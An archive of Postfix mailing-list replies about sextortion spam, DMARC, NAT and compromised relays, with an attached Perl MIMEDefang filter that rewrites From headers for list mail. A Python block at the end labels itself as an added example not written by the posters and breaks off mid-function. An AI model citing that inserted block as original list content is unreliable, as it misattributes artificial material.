> that SMTP server is written in Perl, and I've been known to be DDoS'd
> from time to time.  So I'm loath to leave anything written in Perl running
> on any outward facing port.  It's just way too easy for an attacker to
> run the CPU usage up to 100% and keep it there if one does so.
>
> Looking forward to info on Postfix support for ODMR or alternatives thereto.
>
>
> Regards,
> rfg





Re: spam from own email address

2019-04-23 Thread Kevin A. McGrail
On 4/23/2019 12:20 PM, Benny Pedersen wrote:
> // maintainer hat on
>
> why are these rules not added to SpamAssassin core :(
>
Because masscheck and rule QA take too long for the purposes we need
the rules for.

> \\ maintainer hat off
>
> or at least a real SpamAssassin channel repo

Time/money/energy for a solution that doesn't benefit our firm which has
provided the rules at no charge to the world for ~15 years.

We are always looking for sponsors to help with the work though.

Regards,

KAM



Re: spam from own email address

2019-04-23 Thread Kevin A. McGrail
On 4/23/2019 10:02 AM, Ian Jones wrote:
> I am getting emails like the one below, in which the header from is my
> own address. 

Ian, are you using Apache SpamAssassin or something in the mix?  I've
published a lot of rules for these sexploitation scams in KAM.cf and
with an SPF record, you really shouldn't get these in your inbox.


Regards,

KAM



OFF-TOPIC: KAM.cf to Core SA was Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 10:45 PM, Benny Pedersen wrote:
> Kevin A. McGrail wrote on 2019-03-23 00:34:
>
>> Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this
>> exact run of spams.
>
> will you add good rules to core spamassassin ?
>
> so above is testing rules, not yet ready for core; if it's stable, just
> not in core, I can see why they could not be :(

No, sorry.  The core ruleset does not align with my needs specifically
in that the corpora and mass checkers at SA make additions too slow to
promote as well as too unlikely to get promoted for our needs.  We've
provided the file for free since at least 2004 and believe it is good rules.

One bit of good news is that we moved KAM.cf to The McGrail Foundation
which is a 501(c)(3) with a mission to provide services, education and
advocacy for private, secure and unimpeded business and
communications.   It's still ASLv2 licensed but we are looking for
sponsors to help fund its development and as a 501(c)(3), all donations
are tax deductible to the extent permissible by law.

In particular, I'd like to move it to a channel with good mirrors. 
There are also discussions about how to speed up masscheck and publish
multiple rulesets per day. 

Regards,

KAM



Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 9:31 PM, Viktor Dukhovni wrote:
>> Have you checked on haveibeenpwned for the email addresses and domains
>> in question?
> There's no need.  The team mailboxes in question are not associated
> with any login accounts, they're just public contact addresses
> scraped from websites.

You might be aware of this compromise but others might not: "Email
list-cleaning site may have leaked up to 2 billion records"

https://nakedsecurity.sophos.com/2019/03/12/researchers-disagree-on-volume-of-exposed-verificationsio-records/

Regards,

KAM



Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 9:06 PM, Viktor Dukhovni wrote:
> Sure they may also be scraping email addresses from breaches, but
> that's one source.  These scams are not a specific indication that
> one's passwords are at risk.  That's true or false with or without
> receipt of these scams.

Have you checked on haveibeenpwned for the email addresses and domains
in question?

I do not disagree that the scammers are likely throwing everything they
can into their engine to send out the scams whether that's just a
scraped email or more compromised PII. 

So if you see one that has a password and it's legit, don't jump to "OMG,
I've been hacked by this guy."  Look at haveibeenpwned and similar
sources to see: was I pwned through someone else's compromise and do I
need a better unique password regimen?

In general, for lay people, I tell them to use unique passphrases and
they don't stress when they see this BS as much.


Regards,

KAM



Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 7:55 PM, Viktor Dukhovni wrote:
> No.  The scareware alerts are generally completely fake.  They
> are spammed indiscriminately to users the scammer knows nothing
> about.

Viktor, that does not agree with my significant experience studying this
particular spam threat.  Yes, they are "fake" alerts in that they
haven't hacked your PC but they do in fact have some information that
they are extrapolating to scare people. 

What I see with many of the samples is that they are using passwords
gained from massive attacks where passwords were leaked.  These hacks
have led to user/email/password data easily available for gazillions of
people on the darkweb.  Haveibeenpwned.com can give you insight into
this. I recommend you take a look.

This is step #1, obtaining some real passwords and email addresses.

Step #2 is they take this data and use the real passwords to email
people.  It gives the scam a high psychological impact to trick
targets into paying.  People read and go "OMG, that is my password, I
have been hacked" because they don't have unique passwords.  Using this
technique, they separate logic from emotion and get people to pay the
ransom.  That's an important thing in the execution of many cons.

I'm giving a presentation for HIMSS on Mar 28 where we'll cover some of
these bad actor techniques and how to combat them.  It's free and I'd
welcome your feedback and anyone else who would like to join. HIMSS is a
great organization and I think even experts like you and those on this
list will learn some things.  Here's the information to register and attend:

Topic: Bad Actors and the Security Risks of Social Media
Date and Time: Thursday, March 28, 2019 2:00 pm, Eastern Daylight Time (New York, GMT-04:00)
Event number: 927 552 095
Event password: DG#$&uJET1743
Event address for attendees:
https://himss.webex.com/himss/onstage/g.php?MTID=e4a485adfd01c461169172190512e0fe9
Program: HIMSS: Healthcare Cybersecurity Community
Program address:
https://himss.webex.com/himss/onstage/g.php?PRID=dbe3a254261c448fe25995d7d9d2e2bf
Program registration password: The program has no registration password

--- Audio conference information ---
To receive a call back, provide your phone number when you join the event,
or call the number below and enter the access code.
Call-in toll-free number (US/Canada): 1-866-469-3239
Call-in toll number (US/Canada): 1-650-429-3300
Global call-in numbers:
https://himss.webex.com/himss/globalcallin.php?serviceType=EC&ED=743596137&tollFree=1
Toll-free dialing restrictions:
https://www.webex.com/pdf/tollfree_restrictions.pdf
Access code: 927 552 095

Regards,

KAM

-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail



Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 7:19 PM, Christian Schmitz wrote:
> Hi everyone:
>   I have a small mail server with a few email accounts. The server is:
> Opensuse/Postfix/apache
>
> Today I received a phishing email. The words more or less say that I was hacked,
> that he knows my passwords blah blah blah and I must pay in bitcoins. The email
> content is 100% phishing and no real hacking, for several reasons:
Christian,

They do know the passwords but they didn't hack your PC.  See
haveibeenpwned.com.  They compromised other services you use and you
need better password management.

See
https://www.bettercloud.com/monitor/a-top-g-suite-expert-shares-his-31-best-modern-security-tips/
and search passphrases.

Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this exact
run of spams.

Regards,
KAM
-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail



Re: Fwd: analysing of dmarc report

2018-11-21 Thread Kevin A. McGrail
You might look into dmarcian.com to help.
Regards,
KAM

On November 21, 2018 2:33:12 AM EST, Poliman - Serwis  wrote:
>I have a problem with understanding dmarc reports and some features.
>I attach two reports. The first one comes from google.com, the second one from
>tumieszkamy.pl. On my server is the dns zone of domain kamir-transport.pl
>but the whole mail service is deployed on Google - in the dns zone MX points to
>Google and there are all mailboxes, aliases etc. Recently I configured
>dkim and dmarc policies and I got two reports. Honestly I don't know why
>two, from two different providers - google.com and tumieszkamy.pl. Moreover
>in the report originating from google I see the IP of my server [which fails spf
>and dkim policies] and I don't understand why this IP is evaluated? The second
>thing which I don't understand is the second report which I got from
>tumieszkamy.pl.
>The SPF record in the dns zone of domain kamir-transport.pl looked like
>below (now I changed it to something slightly different):
>*v=spf1 mx include:_spf.google.com  -all*
>
>Could anybody help me understand these things?
>
>-- 
>
>*Pozdrawiam / Best Regards*
>*Piotr Bracha*


Re: Read Only account

2018-04-20 Thread Kevin A. McGrail
On 4/20/2018 3:40 PM, @lbutlr wrote:
> How would I configure a user so that they could only read mail and not send 
> any mail (even to local users)?
>
Different auth for POP or IMAP vs SMTP?




Re: Spammer rejected, but resends every 10 minutes. Any way to prevent this

2018-03-13 Thread Kevin A. McGrail
On 3/13/2018 10:51 PM, li...@lazygranch.com wrote:
> I'm getting hit every 10 minutes from this spammer. As you can see I am
> rejecting the message. I wonder if the offending email server doesn't
> know the message is being rejected? 
>
> Mar 13 23:28:58 centos-1gb-sfo1-01 postfix/smtpd[22153]: NOQUEUE:
> reject: RCPT from unknown[113.247.6.67]: 450 4.7.1 Client host
> rejected: cannot find your reverse hostname, [113.247.6.67];
> from= to= proto=ESMTP
> helo=

Have you looked at something like fail2ban that can automate an iptables
block?



Re: FWIW, port 465 gets standards-track blessing from RFC8314

2018-02-12 Thread Kevin A. McGrail

On 2/12/2018 9:05 PM, @lbutlr wrote:

On 2018-02-12 (18:28 MST), Harald Koch  wrote:

I can't think of a single reason to have two submission ports.

Compatibility with the clients that only implement one?

Are there any? It's been a long time since I saw someone using an old enough 
Outlook to require 465.


We support all the ports.  Stretching for a benefit, the only one I can 
see is that it's SSL from end to end without one bit of clear text.  I 
would suppose that would make it less likely to hijack.  I'll admit it's 
a stretch.


Regards,

KAM



Re: Server will send spam

2018-01-29 Thread Kevin A. McGrail

On 1/29/2018 4:59 PM, Maurizio Caloro wrote:


Since today my email server has been sending a lot of rubbish, and I don't 
know why.


Please can anyone give me a little help here!



The evidence you sent shows from a brief review that it's coming from 
your mail server.  I think you likely have a user where the account was 
compromised that's relaying off that box.


Can you cross correlate the mail queued to a single user?  I would 
shut off email while you research.  You are going to have a lot of work to 
clean up off of blacklists I would gather and it will get worse the 
longer it goes on.


Regards,
KAM


Re: Two different IP for one mx

2018-01-29 Thread Kevin A. McGrail

On 1/29/2018 5:03 PM, jin&hitman&Barracuda wrote:

It is 192.168.34.30/24 


So that's a Class C (256 IPs) block from the reserved private class B 
address block*.  So you are definitely NATted if you have access to the 
internet.


If you have a 1:1 NAT and can do port forwards, etc. up stream, it will 
work.  But it sounds like you have something more complicated in front 
of that box.


Regards,

KAM

*https://en.wikipedia.org/wiki/Reserved_IP_addresses or RFC 1918 but 
these are the reserved private network addresses.


10.x.x.x

172.16.x.x to 172.31.x.x

192.168.x.x



Re: Two different IP for one mx

2018-01-29 Thread Kevin A. McGrail

On 1/29/2018 4:09 PM, jin&hitman&Barracuda wrote:
We are trying to move our mx server to another isp. They gave us an IP 
address but there are some strange points. When I try to connect to any 
mail related port on that ip, it sends my connection to our new postfix 
server. There is a destination nat on it. It is strange because I 
can't see my actual source ip. I tried with many different hosts and 
it looks like there is a source nat and I saw the same ip as my source ip 
wherever I try.


From new postfix server,  when i try to reach any server on internet, 
i see another ip address on the source ip field and it is fixed too.


I believe there is a mistake. Could it be feasible two different ip 
for incoming and outgoing on one mx server ?
With NAT it could definitely be possible.  What's your machine's local ip 
address with ifconfig?  Is it a reserved private address?


Regards,
KAM


Re: accept email if pass SPF or DKIM

2018-01-10 Thread Kevin A. McGrail

On 1/10/2018 9:53 PM, li...@lazygranch.com wrote:

RTFMing, I see that both opendkim and python-policyd-spf have
whitelisting capabilities (especially python-policyd-spf). But for the
most part, my legitimate incoming email passes DKIM or SPF, but often
not both. What I would like to do is accept email that passes either
DKIM or SPF, but the milters are not connected in any way that I can
see. What I'm trying to avoid is setting up whitelists for each domain
based on which method of identity the sysop decided to implement.

That sounds like a problematic approach to me.

If an administrator of a domain sets up DNS for SPF records and then 
fails, it should fail.
If an administrator of a domain sets up DNS for DKIM records and that 
fails, it should fail.


If an email is failing either check, that indicates a problem on the 
sending domain administrator's side.  Assuming your system isn't 
breaking DKIM, the sender really should be notified to resolve the 
issue.  Whitelisting would really open you up to problems.


Regards,
KAM


Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail

On 10/2/2017 11:47 AM, Noel Jones wrote:

Yes, for sure. Extra recipients will get a 4xx response.

Note this may*severely*  delay deliveries, depending on the sender's
retry policy.  If a message arrives with 100 recipients, the sender
will need to retry 99 times, which will likely take a very long time.


Agreed about the delay.  I accept once and reinject internally with a 
milter so there is no delay and 1 email with 100 recipients becomes 100 
emails.  But it's nice to know this option exists because it might be 
helpful for store and queue internal purposes.  Thanks for pointing it out!


Regards,
KAM


Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail

On 10/2/2017 11:14 AM, Noel Jones wrote:
http://www.postfix.org/postconf.5.html#smtpd_recipient_limit 
I don't think we are talking about the same thing.  If I set this to 1, 
I would expect a 5xx for an email with more than one recipient. Do you 
know for sure?


Regards,
KAM


Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail

On 10/1/2017 8:15 PM, MRob wrote:
Hello, short of Per-Recipient Data Responses (PRDR) becoming standard, 
may I ask how administrators are faking it? I understand you can 
temp-fail all but the first rcpt-to, but how to do this in Postfix? 
Does it require a custom milter? Surely there must be a published 
solution somewhere?
I do it in a milter two ways.  One, I temp-fail all but one recipient at 
a time which I find problematic or two, I create a new message and 
reinject it to the original recipients.  I do this so I can have per 
user settings on delivery and spam settings.  DKIM makes this tough.


So I'm interested if you can do this in postfix as well.

Regards,
KAM


Re: Simple mailing list: Possible for multiple domains?

2017-08-21 Thread Kevin A. McGrail

Benny,

I wrote those notes years ago when Yahoo! surprised a lot of people with 
the enforcement of DMARC with little consideration for mailing lists.


http://dmarc.org/faq.html#s_3 is the key point.

IMO, some providers acted rashly and broke a lot of things but in the end 
it is likely better for the security of the internet and email.


Regards,
KAM


Re: Simple mailing list: Possible for multiple domains?

2017-08-21 Thread Kevin A. McGrail

On 8/21/2017 8:30 AM, Benny Pedersen wrote:

wie...@porcupine.org skrev den 2017-08-21 14:05:


Use mailman. It sets the envelope sender, meaning that there is no
need for SRS, and presumably supports From: header munging, to work
around DMARC damage.


what damage? At least it's not needed on the postfix mailing list


Hi Benny,

These notes from when we used MD to make a workaround for this issue 
before Mailman also implemented workarounds might help:


  # BLOCK IF FROM YAHOO (AND OTHERS) BECAUSE THEY SET DMARC TOO STRICTLY
  # http://www.pcworld.com/article/2141120/yahoo-email-antispoofing-policy-breaks-mailing-lists.html
  # REWRITE THE FROM HEADER AND OTHER FIELDS PER RECOMMENDATION HERE: http://dmarc.org/faq.html#s_3


Regards,
KAM


Re: accept+discard vs. reject

2017-07-25 Thread Kevin A. McGrail

On 7/25/2017 8:48 PM, /dev/rob0 wrote:

I am curious, what kind of logic do you have to determine that a
spamming client might be a backscatterer?  Are you talking about a
custom policy service, or a milter?


For the record, I can agree to disagree as I respect and understand your 
position.  I just choose to do it differently and think others should as 
well.


But yes, I use a milter.  I am a fanboy of MIMEDefang.

For example, in his case, I have a REDIS backend and would store message 
IDs if I give a 5xx.  Then if I see the same message id retried, you 
could do the 2xx+silent discard.


Regards,
KAM


Re: What's a better error code than 554 to get a sending server to stop retrying?

2017-07-25 Thread Kevin A. McGrail

On 7/25/2017 7:42 PM, /dev/rob0 wrote:

Oh, I disagree.  The best thing to do is to reject anything you're
unwilling/unable to deliver.  You're not causing any bounces; if a
connecting client does generate a bounce for your rejection that is
THEIR problem; or in the case of a human sender, that is the way to
avoid mail loss.


We can debate RFC's all day but the reality is that we are dealing with 
people not following the RFCs like spambots.  They will just retry and 
if you do any type of queue and check, then you can cause backscatter, etc.


My advice remains the same if you have mail you are giving a 5xx that is 
retrying.  Giving it a 5xx is the correct answer.  If that doesn't work, 
you will find you need to 2xx it and silently discard.


As mentioned, we do this for viruses in particular to rid the world of 
them.  I'm sure it breaks an RFC in letter but not in spirit as it's my 
job to avoid viruses getting through and sometimes they are looking for 
blowback messages to carry the payload.


Regards,
KAM


Re: What's a better error code than 554 to get a sending server to stop retrying?

2017-07-25 Thread Kevin A. McGrail

On 7/25/2017 5:51 PM, robg...@nospammail.net wrote:

Depending on where I read about it that "554 5.7.1" error code means "failed 
transaction".
Unfortunately, you might need logic to accept and silently discard. We 
do this, for example, with viruses to avoid blowback.


Regards,
KAM


Re: OT? - Blocking attachments

2017-05-14 Thread Kevin A. McGrail

On 5/14/2017 7:22 AM, john wrote:


This may not be a Postfix problem, but bearing in mind the recent 
events this forum may have some good ideas.


After the recent ransomware attacks we are considering the idea of 
blocking all attachments.  I am not sure of the best way of doing 
this, but several ideas have been put forward:


I am a consistent fan of milter logic, especially MIMEDefang to solve 
these issues.  It allows you the logic of perl combined with Postfix 
where you can use a variety of solutions that fit the issue:  regex to 
block, database connections for allowed senders, system calls to av 
software, attachment renaming, attachment removal/quarantine, etc.


Though realize that the Windows Defender Bug last week or so was a big 
deal because all you had to do is receive the file.  The scanner then 
scanned the specially crafted file and bam: You were compromised without 
even opening the email.  So that throws a wrench in some of your scenarios.


Anyway, I suggest if you are interested, take a look at mimedefang and 
join the mimedefang mailing list.  The bad_filename would be the first 
concept to look at and I'm typically happy to share my tricks open 
source.  Just inappropes to keep bombarding postfix list with 
non-postfix stuff though I agree it's on the fringe.


Regards,
KAM


Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail

On 5/2/2017 10:56 AM, li...@lazygranch.com wrote:

Would a spammy email server only trigger one RBL?


Sure.

Spam is often in the eye of the beholder, people use different feeds, 
different policies, purposes, etc.


I wouldn't discount it that it's an issue just because it's only on one 
RBL.  I'm a public mirror for quite a few and the overlap is not as high 
as one might think.


Regards,
KAM



Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail

On 5/2/2017 10:02 AM, Michael Segel wrote:

Just to follow up…
I ran the check on his domain:
https://mxtoolbox.com/domain/netlite.it/

Pretty clean, maybe a few things to fix, but he’s not on any black list.

I don’t know when he set up his domain, it could be that Trend Micro blocked 
the IP block due to a previous tenant and never took them off.

Truthfully, I don’t use much more than Spamhaus these days. in terms of RBLs.

He’s not running an open relay and if there was a spammer on his network, 
Spamhaus would have caught it too. Or someone else.

It's not Matteo's server and I suspect it's Trend Micro.


Yes, I'm a big fan of MXToolBox.  Great tool!  I agree, you might be 
looking for a ghost in the machine that doesn't exist and it's a FP from 
TrendMicro.



Regards,
KAM

--
*Kevin A. McGrail*
CEO

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 x50 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>



Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail

On 5/2/2017 9:51 AM, Michael Segel wrote:

You can run a check on your MX Server… there are a couple of web sites that do 
this… and I think one or two will identify the RBLs that include you.
One trick I use a lot when I have an infected machine on a network or a 
customer with a problem is that I set up a smarthost running a milter 
that runs the email through a spam checker, logs the answer and then 
tempfails the emails.


Then I can analyze if there is an issue and do a silent discard by 
subject or internal IP if we find a compromised machine while letting 
everything else go through.


Regards,
KAM


Re: Do you know an FOSS email system for kids?

2017-04-30 Thread Kevin A. McGrail

On 4/30/2017 2:12 PM, Dedeco Balaco Baco wrote:

But what did you use to make this interface? Before reading some documentation 
about Beggarmail and Mimedefang, I thought about using PHP. Now I am not sure 
that would be a practical solution.


PHP would be a straightforward way to go.  Any language / framework that 
allows you to build input forms and toggles and store them in a 
database. I've used numerous solutions.


Off the cuff, I'd likely look at http://www.codeigniter.com/

Regards,
KAM


Re: Do you know an FOSS email system for kids?

2017-04-30 Thread Kevin A. McGrail

On 4/30/2017 12:48 PM, Dedeco Balaco Baco wrote:
Kam, I am still a bit puzzled with what I should do. I have seen the 
README file inside your attachment, and it mentions Sendmail several 
times. But it does not mention Postfix. Is it possible to install 
Mimedefang and BeggarMail with Postfix? I have read that Postfix aims 
to be an alternative to Sendmail. But for me, that never installed 
either, it is a doubt if this is possible. And if it isn't, the 
discussion may become offtopic to this list. 
Postfix supports the milter specification and can be used with 
MIMEDefang.  Apologies if the README is confusing.  Treat them as 
interchangeable.



I have also downloaded Mimedefang and read some of its documentation. It seems 
very flexible with its install and work directories - which is something I will 
surely use. Before I play with Mimedefang, should I set up a working mail 
server with Postfix? Or with Sendmail? Please tell, if you know.
You can use either.  The milter specification was invented by sendmail 
so likely I slip into saying sendmail.  But I've used sendmail and 
postfix without technical concern.  Typically it becomes a question of 
licensing.



You mentioned that you cannot give the source for the interface you use. May I 
ask: what is the reason for that? No problem, an interface is something that 
should not be too hard for me. But how exactly you do it?
It has commercial code and graphics we didn't license for distribution.  
Plus I didn't feel it appropriate to bring up licensing on the postfix 
list.  And as you said, I didn't feel a UI was a big deal to implement.


Regards,
KAM


Re: OT? SRV records etc

2017-04-25 Thread Kevin A. McGrail

On 4/25/2017 4:57 PM, John wrote:
How likely is it for a DNS to have SRV records for such things as 
smtp, imap ...
I know that's a dumb question, but I am trying to guesstimate how big a dewy eyed 
optimist I am being in hoping that they are common practise. 
In my experience, very rare, not even sure what I would use them for... 
Lots of experience with lots of domains, never used once for SMTP or 
IMAP that I can remember...


Re: Do you know an FOSS email system for kids?

2017-04-19 Thread Kevin A. McGrail

On 4/19/2017 7:43 AM, Dedeco Balaco Baco wrote:

in the last months, I have been searching for an email system with
some features to make it better for kids, even for younger ages,
and also their parents. We need a few features to guarantee some
security to free messaging among known friends, but some
supervision for unknown addresses.

I have a system I wrote for my kids and nephews/nieces.  It builds
on top of mimedefang with mysql backend.  I cannot share the UI for
the database manipulations but can give you the database layout and
example queries. It used a CMS on Apache that did the ability to
whitelist/blacklist, etc.

I can package up the snippets under GPLv2 and some documentation if
that's a solution you are interested in pursuing.  If you are
interested in publishing it further, even if 3 people ever use it,
I'll be more helpful as I like to surface code I've written for
public benefit.


Please do it, KAM! I would like to see the details of your solution in 
practical ways, both for users and for its administrators. And if I make any 
changes to it, I will make them public somehow, of course.

A detail that does not matter much to me: do you have a reason to choose GPLv2 
instead of GPLv3? I have read two section in the article about GPL in 
Wikipedia: https://en.wikipedia.org/wiki/GPLv2#Version_2 and 
https://en.wikipedia.org/wiki/GPLv3#Version_3 .


Dedeco,

I picked GPLv2 based on the licensing for MIMEDefang to keep the 
original author's wishes specifically v2 or later.


The code is stable and has some nice tricks for SQL from MIMEDefang.

It's a good starting point but I wouldn't oversell it.  I specifically 
cannot include the UI but have included example queries for the quick 
introduction of a UI and the hooks for the report to include links to a 
website for the one click blacklist/whitelist for parents.


Regards,
KAM


beggarmail-1.0.tar.bz2
Description: application/bzip-compressed-tar


Re: Do you know an FOSS email system for kids?

2017-04-18 Thread Kevin A. McGrail

On 4/15/2017 10:31 AM, Dedeco Balaco Baco wrote:

in the last months, I have been searching for an email system with some 
features to make it better for kids, even for younger ages, and also their 
parents. We need a few features to guarantee some security to free messaging 
among known friends, but some supervision for unknown addresses.


I have a system I wrote for my kids and nephews/nieces.  It builds on 
top of mimedefang with mysql backend.  I cannot share the UI for the 
database manipulations but can give you the database layout and example 
queries.  It used a CMS on Apache that did the ability to 
whitelist/blacklist, etc.


I can package up the snippets under GPLv2 and some documentation if 
that's a solution you are interested in pursuing.  If you are interested 
in publishing it further, even if 3 people ever use it, I'll be more 
helpful as I like to surface code I've written for public benefit.


Regards,
KAM


Re: How to implement something close to, but not quite an "announcement-only" mailing list?

2017-04-15 Thread Kevin A. McGrail

On 4/14/2017 10:19 PM, Ramon F Herrera wrote:

On 4/14/2017 8:41 PM, Kevin A. McGrail wrote:

On 4/14/2017 9:35 PM, Ramon F Herrera wrote:


I guess this would be more descriptive and succinct:

A "members-only PLUS disguising of all e-mail addresses 
contained in the headers" mailing list.
I didn't follow all your logic in the previous email but overall 
you'll likely need something like *mailman or majordomo* plus 
something like MIMEDefang in front of it to achieve your needs.


This begs the question, to all the readers: Given those 2 
requirements, and my lack of time to learn/compare Majordomo vs. 
mailman, which one would you use?
Attached is the discussed scrap we use in MIMEDefang that we mangle 
emails before they get to our mailing list.  It maintains the same GPL 
the original MIMEDefang-filter is produced under.  I didn't include 
every sub, etc. as I expect it's not all relevant except to kick off 
your thinking.


I use MIMEDefang with Postfix and it's a very good solution.  I monitor 
the MD list as well if you have questions and use it.


I use Mailman and it works.  Of course, I'm an advisor to Virtru along 
with John Viega, Mailman's original author. So in solidarity with him, 
I'm going to completely malign majordomo and say that it's horrible!  
:-)  More seriously, both are great, both work well and I use lists 
every day using both.  It's like comparing a Honda Civic to a Toyota Camry.  
They both just work and get you from point A to B with little grief or 
comfort.


Regards,
KAM
# This program may be distributed under the terms of the GNU General
# Public License, Version 2, or (at your option) any later version.
#***
#
# Copyright (C) 2017 PCCC
#***

#get domain name from an email address
sub get_domain_from_email {
  my ($domain) = @_;

  #REMOVE ANY LEADING/TRAILING <>'s
  $domain =~ s/(^<|>$)//g;
  #REMOVE ANY LEADING/TRAILING SPACE'S
  $domain =~ s/^ *//g;
  $domain =~ s/ *$//g;
  #REMOVE EVERYTHING UP TO THE @ SYMBOL
  $domain =~ s/.*\@//g;

  return $domain;
}

foreach my $recip (@Recipients) {
  # BLOCK IF FROM YAHOO (AND OTHERS) BECAUSE THEY SET DMARC TOO STRICTLY
  # http://www.pcworld.com/article/2141120/yahoo-email-antispoofing-policy-breaks-mailing-lists.html
  # REWRITE THE FROM HEADER AND OTHER FIELDS PER RECOMMENDATION HERE: http://dmarc.org/faq.html#s_3

  # If Sender is set to DMARC reject and recipient is a mailing list - NOTE Yahoo.com and AOL.com reject as of 4/23
  if (($recip =~ m/\@mailman\./i or
       $recip =~ m/\@lists\./i)

      and

      # exclude the administrivia addresses like admin confirm, join, leave, etc.
      ($recip !~ /\-(admin|bounces|confirm|join|leave|owner|request|subscribe|unsubscribe)(\+.*)?\@/i)

     ) {

    my ($container, $parser, $original, $report2, $dmarc_reject_notice, $daemon_sender,
        $dmarc_result, $sender_domain, $modification_subject, $pretty_sender);

    # Automatically check DMARC DNS entry
    $sender_domain = &get_domain_from_email($Sender);
    # DNS test for DMARC entry with timeout of 5 seconds
    $dmarc_result = &check_dmarc(domain=>$sender_domain, timeout=>5);

    if ($dmarc_result =~ /p=(reject|quarantine)/i) {

      # NOTIFY SENDER AND REWRITE THE SENDER TO A DO-NOT-REPLY ADDRESS
      md_syslog('warning', "Modifying message to mailing list due to DMARC - $recip - $Sender - $Subject");
      $dmarc_reject_notice = "Your email to $recip was modified to prevent your email address on mailing lists from being incorrectly flagged as a forgery.

In order to permit your email through to the mailing list, we have rewritten the From address to a do-not-reply address.  Depending on the list configuration, you may not receive replies and will need to monitor the list.  Additionally, this may delay your email as it will require manual intervention by the list moderator to approve.

We apologize for the inconvenience but the cause of the issue rests squarely with spammers who have forced email providers to implement anti-forgery technologies that impact mailing lists heavily.

Sincerely,

Kevin A. McGrail
President, PCCC";


      #CUSTOMIZE NOTIFICATION PARAMS
      $daemon_sender = 'do-not-re...@daemon.pccc.com';
      $modification_subject = &utf8_to_mime("Important Mailing List Notification re:[". &mime_to_utf8($Subject) ."]");

      #SEND NOTIFICATION
      action_notify_sender_immediately(Sender=>$Sender, DaemonName=>'PCCC Raptor Notice', DaemonAddress=>$daemon_sender,
                                       NotifySenderSubject=>$modification_subject, body=>$dmarc_reject_notice);

      #TEMPORARILY REMOVE MAI
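The decision the attached filter makes (and the comment snippet in the earlier "Simple mailing list" reply describes), as an added example that is not code from the posts or from MIMEDefang: look up the sender domain's DMARC policy, and when it is p=reject or p=quarantine and the recipient is a list address other than an administrivia address, replace From with a do-not-reply address. The check_dmarc() lookup the post left out is filled in here with a parser over a constructed in-memory DNS table; the domains, records and the X-Original-From header are this example's assumptions.

```python
"""DMARC policy check and From rewrite for mailing-list recipients.

Added example, not code from the original posts or from MIMEDefang: it
re-implements in Python the decision the attached Perl filter makes
(recipient is a list address, not an administrivia address, and the
sender domain publishes p=reject or p=quarantine), including the
check_dmarc() lookup the post left out.  DNS is replaced by a
constructed in-memory table so the code runs offline.
"""
import re
from email.utils import formataddr, parseaddr
from typing import Dict, Optional

# Constructed stand-in for the _dmarc.<domain> TXT lookups a real filter
# would make over DNS.  Domains and records are made up for the example.
FAKE_DNS: Dict[str, str] = {
    "_dmarc.strict.example": "v=DMARC1; p=reject; rua=mailto:rua@strict.example",
    "_dmarc.quar.example": "v=DMARC1; p=quarantine; pct=100",
    "_dmarc.lax.example": "v=DMARC1; p=none",
    # Not a DMARC record: must be ignored rather than read as a policy.
    "_dmarc.junk.example": "v=spf1 -all",
}

# Same patterns as the Perl filter: list recipients live under @mailman.
# or @lists., and the admin/bounce/subscribe style addresses are skipped.
LIST_RE = re.compile(r"@(mailman|lists)\.", re.I)
ADMIN_RE = re.compile(
    r"-(admin|bounces|confirm|join|leave|owner|request|subscribe|unsubscribe)(\+.*)?@",
    re.I,
)


def domain_from_email(addr: str) -> str:
    """Strip <>, whitespace and everything up to the @ (like the Perl helper)."""
    addr = addr.strip().strip("<>").strip()
    return addr.rsplit("@", 1)[-1].lower()


def parse_dmarc(txt: str) -> Optional[Dict[str, str]]:
    """Split a TXT record into tag=value pairs; None unless it is v=DMARC1."""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return None
    return tags


def dmarc_policy(domain: str, dns: Dict[str, str] = FAKE_DNS) -> str:
    """Return the domain's p= value, or 'none' when no usable record exists."""
    record = dns.get(f"_dmarc.{domain}")
    tags = parse_dmarc(record) if record else None
    return tags.get("p", "none").lower() if tags else "none"


def needs_rewrite(sender: str, recipient: str, dns: Dict[str, str] = FAKE_DNS) -> bool:
    """True when list delivery would otherwise trip the sender's DMARC policy."""
    if not LIST_RE.search(recipient) or ADMIN_RE.search(recipient):
        return False
    return dmarc_policy(domain_from_email(sender), dns) in ("reject", "quarantine")


def rewrite_from(headers: Dict[str, str], recipient: str, daemon_sender: str,
                 dns: Dict[str, str] = FAKE_DNS) -> Dict[str, str]:
    """Return a copy of the headers with From replaced by the do-not-reply
    address when needs_rewrite() says so.  Keeping the original address in
    X-Original-From is this example's choice, not something the post does."""
    out = dict(headers)
    original = headers["From"]
    if needs_rewrite(original, recipient, dns):
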